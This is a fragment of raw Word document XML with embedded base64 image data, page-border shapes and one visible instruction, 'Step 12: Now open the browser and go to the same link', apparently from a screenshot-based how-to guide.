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&#10;PNP/6fN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B5ZXMJAQA&#10;AMANAAAOAAAAAAAAAAAAAAAAAD0CAABkcnMvZTJvRG9jLnhtbFBLAQItAAoAAAAAAAAAIQAl3LNx&#10;YIYBAGCGAQAUAAAAAAAAAAAAAAAAAI0GAABkcnMvbWVkaWEvaW1hZ2UxLmpwZ1BLAQItABQABgAI&#10;AAAAIQBhMmQB3QAAAAUBAAAPAAAAAAAAAAAAAAAAAB+NAQBkcnMvZG93bnJldi54bWxQSwECLQAU&#10;AAYACAAAACEAN53BGLoAAAAhAQAAGQAAAAAAAAAAAAAAAAApjgEAZHJzL19yZWxzL2Uyb0RvYy54&#10;bWwucmVsc1BLBQYAAAAABgAGAHwBAAAajwEAAAA=&#10;">
                <v:rect id="Rectangle 3266" o:spid="_x0000_s1253" style="position:absolute;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0CA28AB1" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3267" o:spid="_x0000_s1254" style="position:absolute;left:59448;top:34110;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2DD0A26A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3268" o:spid="_x0000_s1255" style="position:absolute;top:3575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127A9872" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 3280" o:spid="_x0000_s1256" type="#_x0000_t75" style="position:absolute;left:383;top:1874;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UIwgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/LisIw&#10;FN0P+A/hCm4GTe3AWKpRRBFcDA4+Fi4vzbUtNjelibb69WYhuDyc92zRmUrcqXGlZQXjUQSCOLO6&#10;5FzB6bgZJiCcR9ZYWSYFD3KwmPe+Zphq2/Ke7gefixDCLkUFhfd1KqXLCjLoRrYmDtzFNgZ9gE0u&#10;dYNtCDeVjKPoVxosOTQUWNOqoOx6uBkF7I/ftD7vb8/4Gu/+O/k3abeJUoN+t5yC8NT5j/jt3moF&#10;P3ES9oc34QnI+QsAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAegKUIwgAAAN0AAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;">
                  <v:imagedata r:id="rId80" o:title=""/>
                </v:shape>
                <v:shape id="Shape 3281" o:spid="_x0000_s1257" style="position:absolute;left:256;top:1747;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s3xAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;FMTvgt8hPGFvmraKlGoU2XUXj/6DZW+P5tkWm5fSRNv99kYQPA4z8xtmue5NLe7UusqygngSgSDO&#10;ra64UHA+fY9TEM4ja6wtk4J/crBeDQdLzLTt+ED3oy9EgLDLUEHpfZNJ6fKSDLqJbYiDd7GtQR9k&#10;W0jdYhfgppZJFM2lwYrDQokNfZaUX483o2DbJb/+b/9zTeOL1c2s+OLp/qTUx6jfLEB46v07/Grv&#10;tIJpksbwfBOegFw9AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhABlNqzfEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m,3329305r5899150,l5899150,,,,,3329305xe" filled="f" strokeweight="2pt">
                  <v:path arrowok="t" textboxrect="0,0,5899150,3329305"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6177B954"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07392" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="126244B3" wp14:editId="5EF244B1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="41079" name="Group 41079"/>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40" name="Shape 498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41" name="Shape 498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42" name="Shape 498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43" name="Shape 498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44" name="Shape 498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79" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49845" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49846" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49847" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49848" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4984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0F4226F3" wp14:editId="77DCFA49">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="41080" name="Group 4108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50" name="Shape 498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51" name="Shape 498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52" name="Shape 498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53" name="Shape 498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54" name="Shape 498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80" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49855" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49856" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49857" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49858" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4985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Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>12 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Now open the browser and go to the same link </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490DAB33" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="84"/>
        <w:ind w:right="-185"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="737AC3B1" wp14:editId="47B26333">
                <wp:extent cx="5986882" cy="3752745"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="41078" name="Group 41078"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5986882" cy="3752745"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5986882" cy="3752745"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="3273" name="Rectangle 3273"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5944820" y="3236261"/>
                            <a:ext cx="55943" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4C7D8442"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274" name="Rectangle 3274"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="3400852"/>
                            <a:ext cx="55943" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="09FB93E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275" name="Rectangle 3275"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="3603545"/>
                            <a:ext cx="55943" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2FEF89B3"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3283" name="Picture 3283"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId81"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="38303" y="12700"/>
                            <a:ext cx="5873750" cy="3303905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="3284" name="Shape 3284"/>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7AC3B1" id="Group 41078" o:spid="_x0000_s1258" style="width:471.4pt;height:295.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59868,37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ZT/8HgQAAMANAAAOAAAAZHJzL2Uyb0RvYy54bWzcV21v2zYQ/j5g&#10;/0HQ98aybDmyEKcYmjUoMKxB2/0AmqIsYRRJkPTbfv3ujpTsxumyZkARLEBkvhzvnntI3h1v3h56&#10;meyEdZ1Wq3R6laWJUFzXndqs0j++vH9TponzTNVMaiVW6VG49O3tzz/d7E0lct1qWQubgBLlqr1Z&#10;pa33pppMHG9Fz9yVNkLBZKNtzzx07WZSW7YH7b2c5Fm2mOy1rY3VXDgHo3dhMr0l/U0juP/YNE74&#10;RK5SwObpa+m7xu/k9oZVG8tM2/EIg70ARc86BUZHVXfMs2RruwtVfcetdrrxV1z3E900HRfkA3gz&#10;zR55c2/11pAvm2q/MSNNQO0jnl6slv++u7fms3mwwMTebIAL6qEvh8b2+AsokwNRdhwpEwefcBgs&#10;luWiLPM04TA3uy7y63kRSOUtMH+xjre/PrNyMhiefAVnb+CAuBMH7r9x8LllRhC1rgIOHmzS1eBA&#10;fj1LE8V6OKmf4OwwtZEioVGih2RHslzlgLcnmCqW83mZw3FDTvLZIl9MAycjayABhpCz6bKczxY4&#10;PTrOKmOdvxe6T7CxSi1AodPFdr85H0QHETQvFX6Vft9JGWZxBPgbEGLLH9YHcnKaLdEcjq11fQTX&#10;W23/+giXuJF6v0p1bKV4r8E6zqaJ/KCAcrxCQ8MOjfXQsF6+03TRAp5ftl43HQE+WYvAYC8Dhh+x&#10;qfMnN3U+0AAH4PlNjds5z7KyyF/Tdk4pip0I/v9vZ/HkdlLcQRq+ZzsX2awYItbruJ1TihWvYTtN&#10;xyv4j2kHWhch9/n0DKv81oo0Kun/lY6e2T+35g1kSMN8t+5k54+U7SEIIii1e+g4Rl7snEfvcoze&#10;IIB2IXbDGES7QRLXYYjE/ldq1rIzGD8xcmE7AoZS4VGqfcLnkMbvNN/2QvlQl1ghAbtWru2MSxNb&#10;iX4tIMXYD3VMBs5b4XmLBhswjPkmBO9xglCegCHmb2ScWTnLwHfMJ/l1Fsua8TyX15CZIX5RjgbB&#10;ZUZ35aUJh2AFINQEXD8slJdjKKcMjvv7fWE8L+DKE1MXLC2X0xNL+XJ2wRLfhrSMWzakYij56pCU&#10;YawdWvyghiYm73+sPuGM4zpUis0EUnBRRiwtFBCzAAXne8jNXzRJ+lNpNUiE03OSkepcdtSJRUnU&#10;GVYMcsOvId3n8kQVHJdBYvgNkiEzPpbhUjsRDKBbVN+MroKuczKlQq/zApIrnFIG74AGbg+VPFAC&#10;q3rAeVHUOH+UAvmQ6pNooLyBknRK65zdrN9Jm+wYFiT0h3GAnABRXBNuXVyVfXMVijJpWhZ1RTXR&#10;AKmMmlBS0KNjBBPV8ogmvDygfgc/h/cHQBoXESyt/LhewauJDGJCiN6ecgM6hD0qpqhehmcCIYpP&#10;GnyHnPdJ/vTwuv0bAAD//wMAUEsDBAoAAAAAAAAAIQB0n5ixCzwBAAs8AQAUAAAAZHJzL21lZGlh&#10;L2ltYWdlMS5qcGf/2P/gABBKRklGAAEBAQBgAGAAAP/bAEMAAwICAwICAwMDAwQDAwQFCAUFBAQF&#10;CgcHBggMCgwMCwoLCw0OEhANDhEOCwsQFhARExQVFRUMDxcYFhQYEhQVFP/bAEMBAwQEBQQFCQUF&#10;CRQNCw0UFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFP/A&#10;ABEIAh4D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3wX4K8HWvw08O6jfeG9HESaTbyTSSWEH/ADyTrxXB+PvjV8BvhjJp0evaVpiHUEk+&#10;z/ZtCSff5fX/AFcZrS+KmtX/AIb/AGO73UdMu5LG/tfDNvJBcx/6yN/Ljr5Fj17UvC/hvwZ8TPiT&#10;fWt9b6ZaeZpGk237y4uLiSP935nmfu4/+eleVjsc8LyJQ5+c9LC4X63z3n8B9y+Abb4c/E/w7FrW&#10;jeE9PFjK7xj7ZoqW8mR1+R4811P/AAq3wfgf8Uron/gug/8AiK8n/Zn+LE/xY